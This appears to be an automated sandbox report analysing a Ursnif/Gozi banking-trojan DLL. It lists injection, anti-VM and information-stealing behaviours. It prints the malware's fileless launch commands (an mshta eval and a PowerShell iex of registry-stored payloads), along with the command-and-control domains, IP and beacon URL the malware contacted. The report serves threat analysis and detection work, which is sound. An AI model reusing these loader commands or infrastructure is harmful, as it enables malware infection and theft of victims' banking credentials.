Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007705EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_007705EF
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000023.00000000.432859058.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000027.00000002.1292477981.000001FC1125D000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000023.00000000.427109016.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: mshta.exe, 0000001A.00000002.389215125.000002442F93C000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000023.00000000.427133849.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00765BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00765BD5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007816A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_007816A5
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: EE0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10B0000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: EB Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5308 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 3668
Source: C:\Windows\explorer.exe Thread register set: target process: 4376
Source: C:\Windows\explorer.exe Thread register set: target process: 4588
Source: C:\Windows\explorer.exe Thread register set: target process: 4652
Source: C:\Windows\System32\control.exe Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe Thread register set: target process: 5112
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6142312E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6142312E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10B0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E00000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000023.00000000.419359946.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007704D7 cpuid 0_2_007704D7
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_10001B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0077B585
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001000
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000210F GetUserNameA, 0_2_1000210F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_1000166F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 340570 Sample: u.dll Startdate: 16/01/2021 Architecture: WINDOWS Score: 100 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 6 other signatures 2->75 8 mshta.exe 19 2->8         started        11 loaddll32.exe 1 2->11         started        13 iexplore.exe 1 55 2->13         started        15 iexplore.exe 2 83 2->15         started        process3 signatures4 91 Suspicious powershell command line found 8->91 17 powershell.exe 2 32 8->17         started        93 Detected Gozi e-Banking trojan 11->93 95 Writes to foreign memory regions 11->95 97 Allocates memory in foreign processes 11->97 99 4 other signatures 11->99 21 control.exe 11->21         started        23 iexplore.exe 29 13->23         started        26 iexplore.exe 29 13->26         started        28 iexplore.exe 29 13->28         started        30 iexplore.exe 39 15->30         started        process5 dnsIp6 49 C:\Users\user\AppData\...\v0ewugxm.cmdline, UTF-8 17->49 dropped 51 C:\Users\user\AppData\Local\...\0oy3xkhb.0.cs, UTF-8 17->51 dropped 77 Injects code into the Windows Explorer (explorer.exe) 17->77 79 Writes to foreign memory regions 17->79 81 Compiles code for process injection (via .Net compiler) 17->81 83 Creates a thread in another existing process (thread injection) 17->83 32 explorer.exe 17->32 injected 36 csc.exe 17->36         started        39 csc.exe 17->39         started        41 conhost.exe 17->41         started        85 Changes memory attributes in foreign processes to executable or writable 21->85 87 Modifies the context of a thread in another process (thread injection) 21->87 89 Maps a DLL or memory area into another process 21->89 59 golang.feel500.at 46.173.218.93, 49731, 49732, 49744 GARANT-PARK-INTERNETRU Russian Federation 30->59 file7 signatures8 process9 dnsIp10 57 c56.lepini.at 32->57 61 Changes memory attributes in foreign processes to executable or writable 32->61 63 Writes to foreign memory regions 32->63 65 Allocates memory in foreign processes 32->65 67 4 other signatures 32->67 43 RuntimeBroker.exe 32->43 injected 53 C:\Users\user\AppData\Local\...\v0ewugxm.dll, PE32 36->53 dropped 45 cvtres.exe 36->45         started        55 C:\Users\user\AppData\Local\...\0oy3xkhb.dll, PE32 39->55 dropped 47 cvtres.exe 39->47         started        file11 signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.173.218.93
 unknown Russian Federation
47196 GARANT-PARK-INTERNETRU false

Contacted Domains

Name IP Active
c56.lepini.at 46.173.218.93 true
golang.feel500.at 46.173.218.93 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://golang.feel500.at/api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/OvqSLxhTQ3_2FvabW_/2FgZB0ja6/5x9Za3_2FQN4ZdUGH6lo/suw50whDv5PhfbDIdeX/T8eQmCtvYhggs3SS3gjEZp/M9FvWod65aEU9/G6avRfSM/LfZoGD4M2GwS3WWXnDZAQsS/VIiOqdfsU1/pU1_2B6cKaXhAnsco/82IM1VR4P9YJ/_2BGT5YwaNg/KNwzb_2F0dky5V/sFXJntfI7YvzRXn9ooIqO/8cWsv_2FMjFm7Qz8/GqjkN8IiVtb8odv/cswSX5yoUMDZAw42Dq/yWZp false
  • Avira URL Cloud: safe
 unknown
http://golang.feel500.at/favicon.ico false
  • Avira URL Cloud: safe
 unknown